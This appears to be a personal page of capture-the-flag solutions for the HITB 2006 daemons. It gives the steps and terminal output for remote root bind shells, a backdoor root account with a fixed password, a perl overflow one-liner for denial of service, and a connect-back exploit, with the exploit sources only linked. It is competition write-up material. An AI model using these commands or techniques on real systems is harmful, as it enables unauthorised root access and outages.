Matador's site



  • HITB 2006 CTF daemons solutions
  • An article about technique to exploit Mac on x86
  • Contact me








    - UP -

    HITB 2006 CTF daemons solutions:

    Daemon Source Exploit Details
    01 Source Work in progress (80%)
    Details
    02 Source Work in progress (20%)
    Details
    03 Source the daemon03 exploit(Day1)
    the daemon03 exploit(Day2)
    Details Day1
    Details Day2
    04 Source the daemon04 exploit(Day1)
    the daemon04 exploit(Day2)
    Denial of Service
    Details Day1
    Details Day2
    06 Source the daemon06 exploit
    Details


    - UP -

    Remote root shell



    This exploit create a root shell that listen on port 12345.
    Steps to do:

    - python ./exp03.py | nc IP-address 3333

    - nc IP-address 12345

    consequences...

    debian:~# nc IP-address 12345
    ls
    bin
    boot
    cdrom
    dev
    etc
    .
    .
    .
    .
    .
    tmp
    usr
    var
    vmlinuz
    vmlinuz.old
    id
    uid=0(root) gid=0(root)

    not bad :-P

    - UP -

    Day2 ..take the flag


    Steps to do:

    - python ./exp03.py.day2 | nc IP-address 3333

    - nc IP-address 12345

    debian:~# nc 1.21.198.53 12345
    AAAAAAAAAABBBBBBBBBP

    the flag :-)

    - UP -

    Remote Add User



    This exploit add user in machine with follow credentials:

    user: matador
    password: matador

    Steps to do:

    - python ./exp.py.day1 2 | nc IP-address 4444

    - ssh matador@IP-address

    consequences...

    /etc/passwd

    .
    .
    daemon03:x:1003:65534::/flags/daemon03:/bin/false
    daemon04:x:1004:65534::/flags/daemon04:/bin/false
    daemon05:x:1005:65534::/flags/daemon05:/bin/sh
    daemon06:x:1006:65534::/flags/daemon06:/bin/false
    daemon07:x:1007:65534::/flags/daemon07:/bin/false
    matador:AA5hsAy6/h3Wk:0:0::/:/bin/sh

    ssh matador@IP-address
    matador@IP-address's password:
    Linux ctf 2.6.15-26-686 #1 SMP PREEMPT Fri Sep 8 20:16:40 UTC 2006 i686 GNU/Linux

    The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.

    Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
    root@ctf:/# id
    uid=0(root) gid=0(root) groups=0(root)
    root@ctf:/#

    Maybe there will is/are easier version/s but I have found this one :-P



    - UP -

    Exploit on Day2 image



    Steps to do:

    - python ./exp.py.day2 2 | nc IP-address 4444

    - nc IP-address 12345

    consequences...

    matador@matador-desktop:~$ nc IP-address 12345
    0000000 4141 4141 4141 4141 4141 4242 4242 4242
    0000010 4242 5042 000a
    0000015

    the flag :-P



    - UP -

    Denial of Service


    There is another exploit(DoS) for this Daemon

    perl -e "print 'a'x2105" | nc IP-address 4444 it's very simple..but it work good! :-P



    - UP -

    Connect back..flag


    The exploit work like that:

    - modify (inside the source) the "localhost" with victim IP

    - compile the source "gcc -lpthread -o exp06 exp06.c"

    - use it... :P

    - UP -

    daemon01 and daemon02


    They are quite difficult, especially the second one.

    If u wanna help me, pls contact me :)


    - UP -

    Mac


    An article about technique to exploit Mac on x86:

    ENG version
    ITA version


    Some links...
    Security Wireless
    Vecna's homepage
    Cert-it
    0xdeadbeef dot info
    Phrack
    Gera